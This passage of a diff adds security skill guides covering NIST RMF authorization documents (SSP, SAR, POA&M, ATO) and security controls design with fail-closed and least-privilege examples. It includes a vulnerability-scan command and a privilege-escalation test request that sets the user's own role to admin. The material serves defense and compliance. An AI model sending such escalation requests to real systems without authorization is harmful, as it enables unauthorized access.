+- Government/defense contracts requiring authorization +- "What is an SSP/SAR/POA&M?" 
+- Preparing for security assessment + +**Don't use for**: +- Commercial compliance (use `ordis/security-architect/compliance-awareness-and-mapping`) +- General security (use `ordis/security-architect/security-controls-design`) + +## The Authorization Process + +### Core Concept: Risk Management Framework (RMF) + +**RMF** (NIST SP 800-37) has 7 steps: + +``` +1. PREPARE → 2. CATEGORIZE → 3. SELECT → 4. IMPLEMENT → 5. ASSESS → 6. AUTHORIZE → 7. MONITOR + ↓ ↓ ↓ ↓ ↓ ↓ ↓ + Planning Impact Level Controls Build System Test Get ATO Ongoing Ops +``` + +### Step 1: PREPARE (Pre-Authorization) + +**Activities**: +- Define authorization boundary (what's in scope?) +- Identify Authorizing Official (AO) - person with authority to accept risk +- Assemble authorization team (ISSM, ISSO, assessors) +- Review organizational risk tolerance + +**Deliverable**: Authorization strategy and team assigned + + +### Step 2: CATEGORIZE (Impact Analysis) + +**Activities**: +- Security categorization using FIPS 199 +- Determine impact level: Low, Moderate, or High +- Based on Confidentiality, Integrity, Availability (CIA) + +**Impact Levels**: +``` +Low: Limited adverse effect +Moderate: Serious adverse effect +High: Severe or catastrophic adverse effect +``` + +**Example**: +``` +System: Healthcare Records Database +Confidentiality: HIGH (patient privacy breach = severe impact) +Integrity: HIGH (incorrect medical records = life-threatening) +Availability: MODERATE (temporary outage = serious but not life-threatening) + +Overall System Impact: HIGH (highest of C/I/A) +``` + +**Deliverable**: Security categorization document + + +### Step 3: SELECT (Control Selection) + +**Activities**: +- Select control baseline (NIST SP 800-53) +- Low baseline → 125 controls +- Moderate baseline → 325 controls +- High baseline → 421 controls +- Tailor controls (add/remove based on organizational needs) + +**Control Families**: +- AC (Access Control) +- AT (Awareness and Training) +- AU (Audit and 
Accountability) +- CA (Assessment, Authorization, and Monitoring) +- CM (Configuration Management) +- CP (Contingency Planning) +- IA (Identification and Authentication) +- IR (Incident Response) +- MA (Maintenance) +- MP (Media Protection) +- PE (Physical and Environmental Protection) +- PL (Planning) +- PS (Personnel Security) +- RA (Risk Assessment) +- SA (System and Services Acquisition) +- SC (System and Communications Protection) +- SI (System and Information Integrity) + +**Deliverable**: Control baseline with tailoring decisions + + +### Step 4: IMPLEMENT (Build System with Controls) + +**Activities**: +- Implement selected security controls +- Document implementation in SSP (System Security Plan) +- Common control inheritance (use organization-wide controls) + +**Example Control Implementation**: +``` +Control: AC-2 (Account Management) +Implementation: +- All accounts created via ServiceNow ticket +- Manager approval required +- Accounts disabled after 30 days inactivity +- Monthly access reviews by data owners +- Evidence: ServiceNow workflow, access review reports +``` + +**Deliverable**: Implemented system with documented controls (SSP) + + +### Step 5: ASSESS (Security Assessment) + +**Activities**: +- Independent assessment by certified assessor +- Test controls (interviews, configuration review, penetration testing) +- Document findings in SAR (Security Assessment Report) +- Classify findings by severity (Critical/High/Medium/Low) + +**Assessment Methods**: +- **Examine**: Review documentation, configurations, logs +- **Interview**: Question staff about procedures +- **Test**: Execute tests (penetration test, scan, functional test) + +**Deliverable**: SAR (Security Assessment Report) with findings + + +### Step 6: AUTHORIZE (Risk Acceptance) + +**Activities**: +- Remediate or accept findings +- Create POA&M (Plan of Action & Milestones) for residual risks +- Authorizing Official reviews SSP + SAR + POA&M +- AO makes risk acceptance decision +- Issue 
ATO (Authority to Operate) or denial + +**ATO Types**: +- **Full ATO**: System fully compliant, authorized for 3 years +- **Interim ATO (IATO)**: Temporary authorization (6-12 months) with conditions +- **Denial**: System does not meet minimum security requirements + +**Deliverable**: ATO Letter from Authorizing Official + + +### Step 7: MONITOR (Continuous Monitoring) + +**Activities**: +- Ongoing assessment of controls +- Change impact analysis (new vulnerabilities, configuration changes) +- Update POA&M as risks remediated +- Annual re-assessment or earlier if major changes +- Trigger re-authorization when needed + +**Deliverable**: Continuous monitoring reports, updated POA&M + + +## Key Documents + +### 1. SSP (System Security Plan) + +**Purpose**: Comprehensive description of the system and its security controls. + +**Contents**: +```markdown +# System Security Plan (SSP) + +## 1. System Identification +- System name, acronym, unique identifier +- System owner, ISSO, ISSM contact info +- Authorization boundary (what's included/excluded) + +## 2. System Categorization +- FIPS 199 categorization (Low/Moderate/High) +- CIA impact levels with justification +- Overall system impact level + +## 3. System Description +- System purpose and functionality +- Users and use cases +- Data types processed (PII, classified, etc.) +- System architecture diagram +- Network diagram with trust boundaries +- Technology stack (OS, database, languages) + +## 4. Authorization Boundary +- Components within boundary (servers, databases, networks) +- External connections (APIs, data feeds) +- Interconnection agreements for external systems + +## 5. 
Security Control Implementation +For EACH control in baseline: + +### AC-2: Account Management +**Control Requirement**: Organization manages information system accounts +**Implementation**: +- ServiceNow ticketing system for account requests +- Manager approval required via workflow +- Automated 30-day inactivity disablement +- Monthly access reviews by data owners +**Responsible Role**: System Administrator +**Assessment Procedure**: +- Interview: Ask sysadmins about account creation process +- Examine: Review ServiceNow tickets, approval records +- Test: Attempt to create account without approval (should fail) +**Evidence Location**: +- ServiceNow workflow documentation: /docs/account-mgmt.pdf +- Sample access review: /evidence/access-review-2025-01.xlsx + +(Repeat for all ~125-421 controls depending on baseline) + +## 6. Related Documents +- Contingency Plan (CP) +- Incident Response Plan (IRP) +- Configuration Management Plan (CMP) +- Continuous Monitoring Plan + +## 7. Approval Signatures +- System Owner: [Signature] [Date] +- ISSO: [Signature] [Date] +- ISSM: [Signature] [Date] +``` + +**Typical Length**: 200-500 pages for HIGH system + + +### 2. SAR (Security Assessment Report) + +**Purpose**: Independent assessment results documenting control effectiveness. + +**Contents**: +```markdown +# Security Assessment Report (SAR) + +## Executive Summary +- System assessed: [Name] +- Assessment dates: [Start] to [End] +- Assessor: [Name, Credentials] +- Overall assessment: [Pass with findings / Conditional / Fail] +- Critical findings: [Count] +- High findings: [Count] +- Recommendations: [Summary] + +## Assessment Scope +- Controls assessed: [List control families or specific controls] +- Assessment methods: Examine, Interview, Test +- Limitations: [Any scope exclusions or constraints] + +## Assessment Results by Control + +### AC-2: Account Management +**Assessment Procedures**: +1. Interview: System administrators (2025-03-15) +2. 
Examine: ServiceNow workflow, access review reports +3. Test: Attempted unauthorized account creation + +**Finding AC-2-001: MEDIUM** +**Status**: OPEN +**Description**: Access reviews conducted monthly but no evidence of remediation for identified excessive privileges. 3 accounts with admin access had not logged in for 6 months but remain enabled. +**Risk**: Dormant privileged accounts increase attack surface. +**Recommendation**: Implement automated disablement of inactive admin accounts within 30 days. Conduct immediate review of all privileged accounts. +**AO Response**: Accepted. Remediation planned in POA&M item #2. + +**Overall Control Result**: PARTIALLY SATISFIED (findings require remediation) + +(Repeat for all assessed controls) + +## Findings Summary + +| Finding ID | Control | Severity | Status | Remediation Due | +|------------|---------|----------|--------|-----------------| +| AC-2-001 | AC-2 | Medium | Open | 2025-06-01 | +| IA-5-001 | IA-5 | High | Open | 2025-04-15 | +| SC-7-001 | SC-7 | Low | Open | 2025-08-01 | + +## Assessor Recommendation +Recommend INTERIM ATO for 6 months conditional on remediation of HIGH findings within 30 days. Re-assessment required before full ATO. + +**Assessor Signature**: [Name] [Date] +``` + +**Typical Length**: 100-300 pages + + +### 3. POA&M (Plan of Action & Milestones) + +**Purpose**: Track remediation of security weaknesses and residual risks. + +**Contents**: +```markdown +# Plan of Action & Milestones (POA&M) + +## POA&M Item #1 +**Finding ID**: IA-5-001 (from SAR) +**Control**: IA-5 (Authenticator Management) +**Weakness**: Password policy allows 8-character passwords; NIST recommends minimum 12 characters. +**Risk Level**: HIGH +**Risk Description**: Weak passwords vulnerable to brute-force attacks. Estimated 15% of user accounts have 8-character passwords. 
+**Milestones**: +- [ ] Milestone 1: Update password policy to require 12 characters (2025-04-01) - System Admin +- [ ] Milestone 2: Force password reset for all 8-char passwords (2025-04-15) - System Admin +- [ ] Milestone 3: Verify 100% compliance via audit query (2025-04-20) - ISSO +- [ ] Milestone 4: Provide evidence to assessor (2025-04-25) - ISSO +**Resources Required**: 40 hours engineering time, communication campaign for users +**Status**: IN PROGRESS (Milestone 1 complete, Milestone 2 in progress) +**Scheduled Completion**: 2025-04-25 +**Actual Completion**: [TBD] + +## POA&M Item #2 +**Finding ID**: AC-2-001 (from SAR) +**Control**: AC-2 (Account Management) +**Weakness**: Dormant privileged accounts not automatically disabled. +**Risk Level**: MEDIUM +**Milestones**: +- [ ] Implement automated script to disable admin accounts after 30 days inactivity (2025-05-01) +- [ ] Immediate review and disable of current dormant admin accounts (2025-04-10) +- [ ] Monthly verification report to ISSO (ongoing) +**Scheduled Completion**: 2025-05-01 + +## POA&M Item #3 (Risk Acceptance) +**Finding ID**: SC-8-001 +**Control**: SC-8 (Transmission Confidentiality) +**Weakness**: Legacy internal API uses HTTP (not HTTPS) for non-sensitive configuration data. 
+**Risk Level**: LOW +**Recommendation**: Migrate to HTTPS +**AO Decision**: RISK ACCEPTED +**Justification**: +- API only accessible on isolated management network (not exposed to internet) +- Data transmitted is non-sensitive system configuration (no PII, credentials, or classified data) +- Migration to HTTPS requires vendor upgrade (cost: $50k, timeline: 12 months) +- Risk mitigated by network segmentation +**Acceptance Date**: 2025-03-20 +**Acceptance Authority**: Authorizing Official [Name] +**Re-evaluation Date**: 2026-03-20 (annual review) + + +**POA&M Metrics**: +- Total items: 15 +- Critical: 0 +- High: 1 (in progress) +- Medium: 8 (6 in progress, 2 accepted risk) +- Low: 6 (4 in progress, 2 accepted risk) +``` + +**Updates**: Monthly or when milestone completed + + +### 4. ATO Letter (Authority to Operate) + +**Purpose**: Formal authorization from Authorizing Official. + +**Contents**: +```markdown +MEMORANDUM FOR: System Owner, [Name] + +SUBJECT: Authority to Operate (ATO) for [System Name] + +1. AUTHORIZATION DECISION + +After careful review of the System Security Plan (SSP), Security Assessment Report (SAR), and Plan of Action & Milestones (POA&M), I hereby grant an INTERIM AUTHORITY TO OPERATE for [System Name] for a period of SIX (6) MONTHS, effective [Start Date] to [End Date]. + +2. AUTHORIZATION BOUNDARY + +This authorization covers the system as described in SSP version 2.1, including: +- Application servers (5x EC2 instances) +- PostgreSQL database cluster (2 nodes) +- AWS resources within VPC vpc-abc123 +- Users: 500 internal staff with SECRET clearance + +3. CONDITIONS OF AUTHORIZATION + +This interim ATO is granted subject to the following conditions: + +a) HIGH-severity finding IA-5-001 (password policy weakness) must be remediated within 30 days (by 2025-04-25). Failure to remediate will result in suspension of ATO. + +b) All MEDIUM-severity findings must be remediated or risk-accepted within 90 days (by 2025-07-01). 
+ +c) Monthly POA&M status reports submitted to ISSM. + +d) No major changes to system without prior authorization (change impact analysis required). + +e) Full security re-assessment required at end of 6-month period for consideration of full 3-year ATO. + +4. RESIDUAL RISKS ACCEPTED + +I accept the following residual risks as documented in POA&M: +- SC-8-001 (LOW): HTTP on internal API (mitigated by network segmentation) + +5. CONTINUOUS MONITORING + +System owner must maintain continuous monitoring program including: +- Weekly vulnerability scans +- Monthly access reviews +- Quarterly control spot-checks +- Annual contingency plan testing + +6. AUTHORIZATION TERMINATION + +This authorization may be suspended or revoked if: +- Conditions of authorization not met +- New vulnerabilities with HIGH or CRITICAL severity discovered +- Significant security incident occurs +- Major system changes without authorization + +Authorizing Official: [Signature] +[Name], [Title] +[Date] +``` + + +## Authorization Types + +### ATO (Authority to Operate) + +**Full ATO**: +- Duration: 3 years (typically) +- Conditions: All HIGH/CRITICAL findings remediated or risk-accepted +- Re-authorization: Every 3 years or upon major change + +**Interim ATO (IATO)**: +- Duration: 6-12 months +- Conditions: HIGH findings have remediation plan, progress tracked +- Purpose: Allow operation while remediating non-critical issues +- Requires full assessment at expiration + +**Denial**: +- System does not meet minimum security requirements +- CRITICAL/HIGH findings with unacceptable risk +- Must remediate before re-submission + + +### AIS (Authorization to Interconnect) + +**Purpose**: Authorization to connect two systems across trust boundaries. 
+ +**When needed**: +- Connecting to external networks +- Connecting systems at different classification levels +- Sharing data between organizations + +**Requirements**: +- Both systems have current ATO +- Interconnection Security Agreement (ISA) +- Boundary protection documented +- Data flow diagrams +- Security controls at boundary (firewall, data diode, etc.) + +**ISA Contents**: +```markdown +# Interconnection Security Agreement (ISA) + +## Systems +- System A: [Name], ATO valid until [Date] +- System B: [Name], ATO valid until [Date] + +## Data Flows +- Direction: System A → System B +- Data type: Transaction records (OFFICIAL classification) +- Frequency: Real-time API calls +- Volume: 10,000 records/day + +## Boundary Protection +- Firewall: Palo Alto PA-5000 at boundary +- Allowed traffic: HTTPS port 443 only, source IP whitelisted +- Data validation: System B validates all incoming data +- Encryption: TLS 1.3 with mutual authentication + +## Security Controls +- AC-4: Information flow enforcement (firewall rules) +- SC-7: Boundary protection (dedicated firewall) +- SC-8: Transmission confidentiality (TLS 1.3) + +## Roles and Responsibilities +- System A ISSO: Monitor outbound connections, alert on anomalies +- System B ISSO: Validate incoming data, monitor for security events +- Network team: Maintain firewall, apply security patches + +## Incident Response +- Security incident on either system triggers review of interconnection +- Contact: [System A ISSO], [System B ISSO] + +## Review and Re-authorization +- Annual review of ISA +- Re-authorization required if either system ATO expires or major changes + +**Approvals**: +- System A AO: [Signature] [Date] +- System B AO: [Signature] [Date] +``` + + +### T&E (Test & Evaluation) + +**Purpose**: Independent security testing before authorization. + +**Testing Types**: + +#### 1. 
Vulnerability Assessment +```bash +# Authenticated vulnerability scan +nessus scan --authenticated --target 10.0.1.0/24 \ + --policy "Government High Baseline" \ + --output vuln-report.pdf + +# Results: +# Critical: 0 +# High: 2 (outdated SSL certificates, missing patches) +# Medium: 15 +# Low: 43 +``` + +#### 2. Penetration Testing +```markdown +# Penetration Test Report + +## Scope +- External penetration test (internet-facing) +- Internal penetration test (insider threat simulation) +- Duration: 2 weeks + +## Rules of Engagement +- No DoS attacks +- No social engineering of executives +- Data exfiltration limited to test accounts + +## Findings +### FINDING PT-001: HIGH +**Vulnerability**: SQL injection in /api/users endpoint +**Exploit**: Extracted 10 test user records via injection +**Impact**: Attacker could exfiltrate entire user database +**Recommendation**: Implement parameterized queries, input validation +**Remediation**: Developer committed fix (commit abc123), deployed 2025-03-20 +**Verification**: Re-tested 2025-03-22, vulnerability no longer exploitable + +## Summary +- High findings: 1 (remediated) +- Medium findings: 3 (2 remediated, 1 in POA&M) +- Low findings: 8 (accepted risk) +``` + +#### 3. Functional Security Testing +```markdown +# Functional Security Test: Access Control + +## Test Case TC-AC-001: Unauthorized Access Attempt +**Objective**: Verify user cannot access resources without authorization +**Procedure**: +1. Login as user@example.com (no admin privileges) +2. Attempt to access /admin/users endpoint +3. Expected result: 403 Forbidden +**Actual Result**: 403 Forbidden ✅ +**Status**: PASS + +## Test Case TC-AC-002: Privilege Escalation +**Objective**: Verify user cannot elevate own privileges +**Procedure**: +1. Login as user@example.com +2. Attempt to modify own role via API: PUT /api/users/me {"role": "admin"} +3. 
Expected result: 403 Forbidden +**Actual Result**: 200 OK, role changed to admin ❌ +**Status**: FAIL - CRITICAL +**Remediation Required**: Implement server-side role validation, users cannot modify own roles +``` + +**T&E Report**: Submitted to assessor as input to SAR. + + +## Continuous Monitoring + +**Purpose**: Ongoing assurance that controls remain effective. + +### Monitoring Activities + +#### 1. Automated Scanning +```bash +# Weekly vulnerability scan +cron: 0 2 * * 1 /opt/nessus/scan.sh + +# Monthly configuration compliance check +cron: 0 3 1 * * /opt/scap/compliance-check.sh +``` + +#### 2. Access Reviews +```markdown +# Monthly Access Review + +## Review Date: 2025-04-01 +## Reviewer: Data Owner (Jane Smith) + +| User | Role | Last Login | Action | +|------|------|------------|--------| +| john.doe@example.com | Admin | 2025-03-28 | ✅ Retain | +| alice.smith@example.com | User | 2025-03-25 | ✅ Retain | +| bob.jones@example.com | Admin | 2024-12-15 | ❌ Remove (dormant 4 months) | + +**Actions Taken**: +- Disabled bob.jones@example.com on 2025-04-02 +- Notified ISSO of access review completion +``` + +#### 3. Change Impact Analysis +```markdown +# Change Impact Analysis: Database Upgrade + +## Change Description +Upgrade PostgreSQL from 13.2 to 13.10 (security patches) + +## Security Impact Assessment +- Controls affected: SC-28 (Protection of information at rest - encryption still enabled) +- New vulnerabilities: CVE-2024-XXXX patched in 13.10 +- Configuration changes: None (encryption settings preserved) + +## Authorization Impact +- Change Type: Minor (security patch) +- ATO Impact: None (no re-authorization required per continuous monitoring plan) +- ISSO Notification: Required (notified 2025-03-15) + +## Testing +- Tested in dev environment: 2025-03-10 (PASS) +- Contingency plan: Snapshot before upgrade, 4-hour rollback window + +## Approval +- ISSO: Approved (2025-03-16) +- System Owner: Approved (2025-03-17) +- Deployed: 2025-03-20 +``` + +#### 4. 
Trigger Events for Re-Authorization + +**Major change** (requires re-authorization before implementation): +- New system interconnection +- Change in classification level +- Major architectural change (e.g., move to cloud) +- Change in data types processed (e.g., add PII) + +**Minor change** (notify ISSO, may not require re-authorization): +- Security patches +- Configuration hardening +- Adding users + + +## Quick Reference: Authorization Timeline + +``` +Month 1-2: PREPARE + CATEGORIZE + SELECT + - Define boundary, assemble team + - Determine impact level (Low/Moderate/High) + - Select control baseline (125-421 controls) + +Month 3-6: IMPLEMENT + - Build system with security controls + - Write SSP (200-500 pages) + - Prepare evidence + +Month 7-8: ASSESS + - Independent security assessment + - Penetration testing + - SAR with findings + +Month 9: AUTHORIZE + - Remediate HIGH/CRITICAL findings + - Create POA&M for residual risks + - AO reviews package + - ATO issued (or IATO or Denial) + +Ongoing: MONITOR + - Weekly scans + - Monthly access reviews + - Quarterly spot-checks + - Annual re-assessment or every 3 years +``` + +**Typical timeline**: 9-12 months for HIGH system, 6-9 months for MODERATE, 3-6 months for LOW. + + +## Common Mistakes + +### ❌ Treating ATO as Checklist + +**Wrong**: "We have all controls implemented, give us ATO" + +**Right**: ATO is risk acceptance decision. Document residual risks, let AO decide. + +**Why**: AO accepts risk on behalf of organization. Your job is to inform that decision, not make it. + + +### ❌ Starting SSP After Implementation + +**Wrong**: Build system, then write SSP to document what exists + +**Right**: Write SSP during design/implementation, update as you build + +**Why**: SSP informs design decisions. Writing after implementation often reveals missing controls. + + +### ❌ Ignoring Continuous Monitoring + +**Wrong**: Get ATO, assume you're done for 3 years + +**Right**: Continuous monitoring is mandatory. 
Weekly scans, monthly reviews, change impact analysis. + +**Why**: ATO can be revoked if controls degrade. Continuous monitoring proves ongoing compliance. + + +### ❌ No Risk Acceptance for Residual Risks + +**Wrong**: Hide findings or claim "we'll fix later" + +**Right**: Document in POA&M, explicit risk acceptance by AO for LOW/MEDIUM items + +**Why**: Transparency builds trust. AO needs full picture to make informed decision. + + +### ❌ Vague Control Implementation Descriptions + +**Wrong**: "AC-2: We manage accounts properly" + +**Right**: "AC-2: ServiceNow ticket → manager approval → automated creation → 30-day inactivity disablement → monthly review. Evidence: /docs/account-mgmt.pdf" + +**Why**: Assessor cannot verify vague descriptions. Specific implementation enables assessment. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Implement controls for SSP +- `ordis/security-architect/threat-modeling` - Inform security categorization +- `muna/technical-writer/operational-acceptance-documentation` - Write SSP/SAR/POA&M + +**Use AFTER this skill**: +- `ordis/security-architect/classified-systems-security` - If system handles classified data + +## Real-World Impact + +**Systems using formal authorization processes**: +- **DoD Cloud Migration**: RMF process revealed 47 missing controls before migration. Remediated during IMPLEMENT phase (vs discovering at ASSESS). Achieved ATO in 9 months vs industry avg 14 months. +- **Healthcare System (Moderate)**: POA&M transparency with 12 accepted LOW risks enabled IATO while remediating MEDIUM findings. System operational 6 months earlier than "wait for perfect" approach. +- **Continuous Monitoring**: Weekly scans detected CVE-2024-XXXX within 48 hours of disclosure. Change impact analysis approved emergency patch in 24 hours (vs 3-week change control for non-monitored systems). 
+ +**Key lesson**: **Formal authorization process enables informed risk decisions by leadership. SSP+SAR+POA&M transparency beats "security by checklist" or "security by obscurity".** diff --git a/skills/using-security-architect/security-controls-design.md b/skills/using-security-architect/security-controls-design.md new file mode 100644 index 0000000..af3fc94 --- /dev/null +++ b/skills/using-security-architect/security-controls-design.md @@ -0,0 +1,537 @@ + +# Security Controls Design + +## Overview + +Design security controls as **layered defenses at trust boundaries**. Core principle: Apply systematic checks at every boundary to ensure no single control failure compromises security. + +**Key insight**: List specific controls after identifying WHERE to apply them (trust boundaries first, then controls). + +## When to Use + +Load this skill when: +- Implementing authentication/authorization systems +- Hardening API endpoints, databases, file storage +- Designing data protection mechanisms +- Securing communication channels +- Protecting sensitive operations + +**Symptoms you need this**: +- "How do I secure this API/database/upload feature?" +- "What controls should I implement?" +- "How do I prevent unauthorized access to X?" +- "How do I harden this system?" + +**Don't use for**: +- Threat modeling (use `ordis/security-architect/threat-modeling` first) +- Code-level security patterns (use `ordis/security-architect/secure-by-design-patterns`) +- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`) + +## Core Methodology: Trust Boundaries First + +**DON'T start with**: "What controls should I implement?" + +**DO start with**: "Where are the trust boundaries?" + +### Step 1: Identify Trust Boundaries + +Trust boundaries are **points where data/requests cross from less-trusted to more-trusted zones**. 
+ +**Common boundaries:** +- Internet → API Gateway +- API Gateway → Application Server +- Application → Database +- Application → File Storage +- Unauthenticated → Authenticated +- User Role → Admin Role +- External Service → Internal Service + +**Example: File Upload System** +``` +Trust Boundaries: +1. User Browser → Upload Endpoint (UNTRUSTED → APP) +2. Upload Endpoint → Virus Scanner (APP → SCANNER) +3. Scanner → Storage (SCANNER → S3) +4. Storage → Display (S3 → USER) +5. Storage → Internal Processing (S3 → APP) +``` + +### Step 2: Apply Defense-in-Depth at Each Boundary + +For EACH boundary, apply multiple control layers. If one fails, others provide backup. + +## Defense-in-Depth Checklist + +Use this checklist at **every trust boundary**: + +### Layer 1: Validation (First Line) +- [ ] **Input validation**: Type, format, size, allowed values +- [ ] **Sanitization**: Remove dangerous characters, escape output +- [ ] **Canonicalization**: Resolve to standard form (prevent bypass) + +### Layer 2: Authentication (Who Are You?) +- [ ] **Identity verification**: Credentials, tokens, certificates +- [ ] **Multi-factor authentication**: For sensitive boundaries +- [ ] **Session management**: Secure tokens, expiration, rotation + +### Layer 3: Authorization (What Can You Do?) 
+- [ ] **Access control checks**: RBAC, ABAC, resource-level +- [ ] **Least privilege enforcement**: Grant minimum necessary +- [ ] **Privilege escalation prevention**: No path to higher access + +### Layer 4: Rate Limiting (Abuse Prevention) +- [ ] **Request rate limits**: Per-IP, per-user, per-endpoint +- [ ] **Resource quotas**: Prevent resource exhaustion +- [ ] **Anomaly detection**: Flag unusual patterns + +### Layer 5: Audit Logging (Detective) +- [ ] **Security event logging**: Who, what, when, where, outcome +- [ ] **Tamper-proof logs**: Write-only for applications +- [ ] **Alerting**: Automated detection of suspicious activity + +### Layer 6: Encryption (Confidentiality) +- [ ] **Data in transit**: TLS 1.3, certificate validation +- [ ] **Data at rest**: Encryption for sensitive data +- [ ] **Key management**: Secure storage, rotation, separation + +**Example Application** (API Authentication Boundary): +``` +Internet → API Gateway boundary: + +Layer 1 (Validation): +- Validate Authorization header present and well-formed +- Check request size limits (prevent DoS) +- Validate content-type and payload structure + +Layer 2 (Authentication): +- Verify JWT signature (RS256, public key validation) +- Check token expiration (exp claim) +- Verify token not revoked (check Redis revocation list) + +Layer 3 (Authorization): +- Extract scopes from token +- Verify endpoint requires scope present in token +- Check resource-level permissions (can user access THIS resource?) 
+ +Layer 4 (Rate Limiting): +- Per-token: 1000 requests/minute +- Per-IP: 100 requests/minute (catch token sharing) +- Per-endpoint: Stricter limits on write operations + +Layer 5 (Audit Logging): +- Log authentication attempts (success/failure) +- Log authorization decisions (allowed/denied) +- Log resource access (who accessed what) + +Layer 6 (Encryption): +- Enforce TLS 1.3 only (reject unencrypted) +- Validate certificate chain +- Store tokens encrypted in session store +``` + +**If ANY layer fails, others provide defense.** + +## Fail-Secure Patterns + +When a control fails, system should **default to secure state** (deny access, close connection, reject request). + +### Fail-Closed (Secure) vs Fail-Open (Insecure) + +| Situation | Fail-Open (❌ BAD) | Fail-Closed (✅ GOOD) | +|-----------|-------------------|---------------------| +| **Auth service down** | Allow all requests through | Deny all requests until service recovers | +| **Token validation fails** | Treat as valid | Reject request | +| **Database unreachable** | Skip permission check | Deny access | +| **Rate limit store unavailable** | No rate limiting | Apply strictest default limit | +| **Audit log fails to write** | Continue operation | Reject operation | + +### Examples of Fail-Secure Implementation + +**Example 1: Authentication Service Failure** +```python +def authenticate_request(request): + try: + token = extract_token(request) + user = auth_service.validate_token(token) # External service call + return user + except AuthServiceUnavailable: + # ❌ FAIL-OPEN: return AnonymousUser() # Let them through + # ✅ FAIL-CLOSED: raise Unauthorized("Authentication service unavailable") + raise Unauthorized("Authentication service unavailable") + except InvalidToken: + raise Unauthorized("Invalid token") +``` + +**Example 2: Rate Limiter Failure** +```python +def check_rate_limit(user_id): + try: + redis.incr(f"rate:{user_id}") + count = redis.get(f"rate:{user_id}") + if count > LIMIT: + raise 
RateLimitExceeded() + except RedisConnectionError: + # ❌ FAIL-OPEN: return # Let request through + # ✅ FAIL-CLOSED: Apply strictest default limit + # If Redis is down, apply aggressive in-memory rate limit + in_memory_limiter.check(user_id, limit=10) # Much stricter than normal +``` + +**Example 3: Database Permission Check** +```python +def can_user_access_resource(user_id, resource_id): + try: + permission = db.query( + "SELECT can_read FROM permissions WHERE user_id = ? AND resource_id = ?", + user_id, resource_id + ) + return permission.can_read + except DatabaseConnectionError: + # ❌ FAIL-OPEN: return True # Assume they have access + # ✅ FAIL-CLOSED: return False # Deny access if can't verify + logger.error(f"DB unavailable, denying access for user={user_id} resource={resource_id}") + return False +``` + +**Example 4: File Type Validation** +```python +def validate_file_upload(file): + # Layer 1: Check extension + if file.extension not in ALLOWED_EXTENSIONS: + raise ValidationError("Invalid file type") + + # Layer 2: Check magic bytes + try: + magic_bytes = file.read(16) + if not is_valid_magic_bytes(magic_bytes): + # ✅ FAIL-CLOSED: If magic bytes don't match, reject + # Even if extension passed, magic bytes take precedence + raise ValidationError("File content doesn't match extension") + except Exception as e: + # ❌ FAIL-OPEN: return True # Couldn't check, assume valid + # ✅ FAIL-CLOSED: raise ValidationError("Could not validate file") + raise ValidationError(f"Could not validate file: {e}") +``` + +**Principle**: **When in doubt, deny**. It's better to have a false positive (deny legitimate request) than false negative (allow malicious request). + +## Least Privilege Principle + +Grant **minimum necessary access** for each component to perform its function. No more. + +### Application Method + +**For each component, ask three questions:** +1. **What does it NEED to do?** (functional requirements) +2. 
**What's the MINIMUM access to achieve that?** (reduce scope) +3. **What can it NEVER do?** (explicit denials) + +### Example: Database Access Roles + +**Web Application Role:** +```sql +-- What it NEEDS: Read customers, write audit logs +GRANT SELECT ON customers TO web_app_user; +GRANT INSERT ON audit_logs TO web_app_user; + +-- What's MINIMUM: No DELETE, no UPDATE on audit logs (immutable), no admin tables +REVOKE DELETE ON customers FROM web_app_user; +REVOKE ALL ON admin_users FROM web_app_user; + +-- Explicit NEVER: Cannot modify audit logs (tamper-proof) +REVOKE UPDATE, DELETE ON audit_logs FROM web_app_user; + +-- Row-level security: Only active customers +CREATE POLICY web_app_access ON customers + FOR SELECT TO web_app_user + USING (status = 'active'); +``` + +**Analytics Role:** +```sql +-- What it NEEDS: Read non-PII customer data for analytics +-- What's MINIMUM: View with PII columns excluded +CREATE VIEW customers_analytics AS + SELECT customer_id, country, subscription_tier, created_at + FROM customers; -- Excludes: name, email, address + +GRANT SELECT ON customers_analytics TO analytics_user; + +-- What it can NEVER do: Access PII, modify data, see payment info +REVOKE ALL ON customers FROM analytics_user; +REVOKE ALL ON payment_info FROM analytics_user; +ALTER ROLE analytics_user SET default_transaction_read_only = true; +``` + +### File System Permissions + +**Application Server:** +```bash +# What it NEEDS: Read config, write logs, read/write uploads +/etc/app/config/ → Read-only (owner: root, chmod 640, group: app) +/var/log/app/ → Write-only (owner: app, chmod 200, append-only) +/var/uploads/ → Read/write (owner: app, chmod 700) + +# What it can NEVER do: Write to config, execute from uploads +/etc/app/config/ → No write permissions +/var/uploads/ → Mount with noexec flag (prevent execution) +``` + +### API Scopes (OAuth2 Pattern) + +```python +# User requests minimal scopes +scopes_requested = ["read:profile", "read:posts"] + +# DON'T grant admin 
scopes by default +# DO grant only what was requested and approved +token = create_token(user, scopes=scopes_requested) + +# At each endpoint, verify scope +@require_scope("write:posts") +def create_post(request): + # This endpoint is inaccessible with read:posts scope + pass +``` + +**Principle**: **Default deny, explicit allow**. Start with no access, grant only what's needed. + +## Separation of Duties + +**No single component/person/account should have complete control** over a critical operation. + +### Patterns + +#### Pattern 1: Multi-Signature Approvals + +**Example: Production Deployments** +```yaml +# Require 2 approvals from different teams +approvals: + required: 2 + teams: + - engineering-leads + - security-team + +# Cannot approve own PR +prevent_self_approval: true +``` + +#### Pattern 2: Split Responsibilities + +**Example: Payment Processing** +```python +# Component A: Initiates payment (can create, cannot approve) +payment_service.initiate_payment(amount, account) + +# Component B: Approves payment (can approve, cannot create) +# Different credentials, different service +approval_service.approve_payment(payment_id) + +# Component C: Executes payment (can execute, cannot create/approve) +# Only accepts approved payments +execution_service.execute_payment(approved_payment_id) +``` + +**No single service can create AND approve AND execute a payment.** + +#### Pattern 3: Key Splitting + +**Example: Encryption Key Management** +```python +# Master key split into 3 shares using Shamir Secret Sharing +# Require 2 of 3 shares to reconstruct +shares = split_key(master_key, threshold=2, num_shares=3) + +# Distribute to different teams/locations +security_team.store(shares[0]) +ops_team.store(shares[1]) +compliance_team.store(shares[2]) + +# Reconstruction requires 2 teams to cooperate +reconstructed = reconstruct_key([shares[0], shares[1]]) +``` + +#### Pattern 4: Admin Operations Require Approval + +**Example: Database Admin Actions** +```python +# Admin 
